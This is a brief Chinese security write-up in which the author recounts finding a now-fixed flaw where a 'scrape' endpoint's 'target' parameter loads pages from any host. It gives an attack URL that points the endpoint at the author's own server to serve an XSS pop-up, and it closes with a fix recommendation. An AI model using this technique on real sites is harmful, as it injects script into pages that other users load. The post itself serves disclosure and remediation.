深夜睡不着,打开QQ音乐,音乐想起,情到深处,于是我这个菜逼决定写一点最近工作遇到的点。。。
1.这周对业务进行全网扫描时,发现几个有趣的URL (漏洞前天已被修复),基本结构形式如下,都带有一个target的参数。
2.看到target,我第一反应是否可以重定向,于是验证了,并未跳转。
3.换了个思路,在我的服务器上搭建简易http服务开启,远程访问我的服务器并读取带有XSS代码的html文件,从而造成XSS攻击
验证:
1).首先在自己的服务器上搭建简易http服务,并在html文件写入xss弹框。
2).构造攻击链: http://x.x.x.x:x/scrape?target=x.x.x.x:8000/req.html?
成功弹框。。。
修复建议:
服务器侧代码应验证是否允许检索和显示用户输入中的 URL,或根据显示该网址的上下文过滤其响应。